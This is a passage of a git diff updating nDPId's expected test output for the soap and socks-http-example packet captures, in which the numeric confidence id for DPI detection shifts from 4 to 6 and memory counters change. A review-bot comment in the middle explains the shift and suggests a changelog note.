@@ -4,19 +4,19 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946731321416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946731321416,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Js1AAH8GJUPAqAJkFwLVpcO0AFABqrpoAAAAAIAC+vBEVAAAAgQFtAEDAwgBAQQC"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946731321441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946731321441,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADwGjxAXAtWlwKgCZABQw7Tpz83XAaq6aYAS+vCMpAAAAgQFrAEBBAIBAwMH"} 02386{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946731323902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946731323902,"pkt":"eJS0JASgYDjgxTWgCABFAAXUJtJAAH8GH57AqAJkFwLVpcO0AFABqsQz6c\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"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":946731321416,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2904,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":946731321416,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2904,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946731326059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946731326059,"pkt":"eJS0JASgYDjgxTWgCABFAAXUJtNAAH8GH53AqAJkFwLVpcO0EFABqrpp6c\/N2FAQAQTI+AAAUE9TVCAvZndsaW5rLz9MaW5rSUQ9MjUyNjY5JmNsY2lkPTB4NDA5IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IHRleHQveG1sOyBjaGFyc2V0PSJVVEYtMTZMRSINClVzZXItQWdlbnQ6IE1JQ1JPU09GVF9ERVZJQ0VfTUVUQURBVEFfUkVUUklFVkFMX0NMSUVOVA0KU09BUEFjdGlvbjogImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93c21ldGFkYXRhL3NlcnZpY2VzLzIwMDcvMDkvMTgvZG1zL0RldmljZU1ldGFkYXRhU2VydmljZS9HZXREZXZpY2VNZXRhZGF0YSINCkNvbnRlbnQtTGVuZ3RoOiAzNjEyDQpIb3N0OiBnby5taWNyb3NvZnQuY29tDQoNCv\/+PAA\/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgAgAGUAbgBjAG8AZABpAG4AZwA9ACIAVQBUAEYALQAxADYAIgA\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"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":6104,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054092487} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054092487,"flow_last_seen":1639054092487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054092487,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639054092487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1639054092487,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAANKG0QADxBqbEuSDAHlWacnEAUNrcPMefU5W6cMWAEjhAOLcAAAIEBbQBAwMABAIAAA=="} 02098{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639054092538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1285,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1285,"pkt_l4_len":1247,"thread_ts_msec":1639054092538,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAE88IlQAB\/BvOUVZpycbkgwB7a3ABQlbpwxTzHn1RQGAIF1wgAADw\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"} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639054092687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":172,"pkt_l4_len":134,"thread_ts_msec":1639054092687,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAAmsImQAB\/BvfsVZpycbkgwB7a3ABQlbp1kDzHn1RQGAIFKTIAABWnhAex4GkI+Emzf4RIldOZwd02PnXrmBnBHRrx+ET677ALMou1pxMGL4bsefKLEZJCsMhBQeRMREPGyDS\/Ls5rva5OrXg9O7PulAGNv3b+vbLJAQh1CgtCNjRdd437DmknBotv3IGznWL+EIv99mMNCg=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} -00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946731321416,"flow_last_seen":946731326431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4652,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} +00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946731321416,"flow_last_seen":946731326431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4652,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} 
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":9746,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1639054092826} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -26,9 +26,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882554 bytes -~~ total memory freed........: 5882554 bytes -~~ total allocations/frees...: 118149/118149 +~~ total memory allocated....: 6009976 bytes +~~ total memory freed........: 6009976 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 2394 chars diff --git a/test/results/socks-http-example.pcap.out b/test/results/socks-http-example.pcap.out index 9188607d3..8ca1c8266 100644 --- a/test/results/socks-http-example.pcap.out +++ b/test/results/socks-http-example.pcap.out 
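Review bot: The `ndpi.confidence` key for the "DPI" label changes from `"4"` to `"6"` on every detected/idle/end record in this soap.pcap.out hunk, and the same shift appears in the snmp, socks-http-example and softether-http results around it. `{"1":"Match by port"}` is unchanged, so the numeric id is evidently not stable across libnDPI versions; presumably the upstream confidence enum gained entries ahead of DPI. Any consumer of the event stream that filters or alerts on the numeric id rather than the label would silently stop matching after this bump. The commit message names only the submodule hash, so I would add a line such as `ndpi.confidence: id for "DPI" moves 4 -> 6 with this libnDPI bump; match on the label, not the id` to the description or changelog. If the project's JSON schema constrains these keys, it is also worth confirming it still accepts the new value.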
@@ -4,18 +4,18 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} 
-00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 